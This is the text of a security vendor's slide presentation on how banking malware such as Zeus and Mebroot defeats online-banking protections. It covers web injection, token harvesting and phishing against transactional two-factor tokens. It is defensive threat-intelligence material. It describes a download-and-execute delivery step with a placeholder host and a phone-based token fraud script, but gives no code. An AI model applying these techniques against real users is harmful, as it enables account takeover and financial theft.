learning from the bad guys is learning from the best

Learning from the bad guys is learning from the best

A practical overview on how the bad guys adopt and circumvent security initiatives

Commercial – in - Confidence

Alex ShippImagineer


Zeus One of the most successful rootkits Features

It steals user private and confidential information (form grabber)

can inject arbitrary HTML code into any website (also encrypted websites)

can steal certificates will take screenshots to defeat virtual keyboards backconnect feature (SOCKS, BackConnect, VNC) Everything is encrypted


Zeus v2.0

Enhanced Zeus v2 core engine Able to infect Mozilla Firefox Able to infect Windows Vista and

Windows 7▪ They do everything in user-mode (!)

New Encryption method

Details in the TrustDefender Labs report


Zeus plugins

Zeus supports a plugin style infrastructure New BackConnect mechanism▪ E.g. Real-time notification via IM once a

victim is online▪ SOCKS / VNC works even behind NAT

Extensive Javascript engine that can be plugged into Zeus v1 or Zeus v2


Javascript Engine Dramatically increased functionality with

javascript code where they can harvest any challenge/response and/or token

values in real-time and in a more interactive way.

Allows bypass of nearly all challenge mechanisms (e.g. SMS/email/VRU OOB, token, secret

questions/answers, elaborate challenge/response)


Javascript Engine Observations

No “static” HTML injections anymore Nothing happens until after the login Dynamic connection to C&C server▪ Send/receive data within one webpage▪ transparent to the Webbrowser

Dynamic content delivery▪ E.g. After compromise, they return “24h

maintenance” page

But let’s have a look


Login page (unmodified)


Account verification


Cover your tracks


WesCorp login


Ok, I have to use the token (nothing ususual)


Authorizing... (60 down to 0)


Ups... timeout


After restart, the machine is gone


Javascript Engine

As well as manipulating user-supplied content, they can also access system supplied content.

Bad news if you “encrypt” the password on the client side Zeus can just inject code into your

JavaScript files (!)


Javascript Engine

Watch the download of the loginPin.js

And once it’s downloaded...


Completely transparent


Device fingerprinting won’t help BackConnect feature via SOCKS or

VNC Undermines any device fingerprinting


How is Zeus distributed? Drive-by attacks

PDF, Flash or any othersoftware

Phishing attacks

Heavily geo baseddistribution

This is done via a flash object that calls URLMON.DLL.URLDownloadToFileA to save http://<<hostname>>/l.php?i=18 locally to pdfupd.exe and then execute it with WinExec

More details in the next TrustDefender Labs Report


Mebroot is by far the most successful rootkit that is able to stay under the radar

Technically sophisticated, but also very clever We know that they could infect much more

machines, but don’t do so

Bad news: They have a comprehensive javascript engine as well However not used yet (AFAWK)

What is mebroot doing?


Sizzler CSS Selector Engine

If it looks scary, it is scary Watch out for simple device authentication

What is mebroot doing?


Phishing still works (!) Real world example

Bank uses transactional 2FA hardware tokens Phishing site asks for login credentials +

private phone number Fraudsters ring the customer and tell him that

his account got compromised (which is true!) and tell him that in order to get it reconnected, they should enter the following number into their token and confirm the reply!

Phishing with transactional 2FA


... is the R&D arm of TrustDefender TrustDefender is a online-transaction

security solution providing Real-time customer endpoint risk-

assessment & protection for online transactions

More info http://www.trustdefender.com/blog

TrustDefender Labs

http://www.trustdefender.com/blog

http://www.trustdefender.com/blog


Bad guys adopt heavily Protect all parts of the chain.

If one breaks, the chain is broken

Questions?

learning from the bad guys is learning from the best

Documents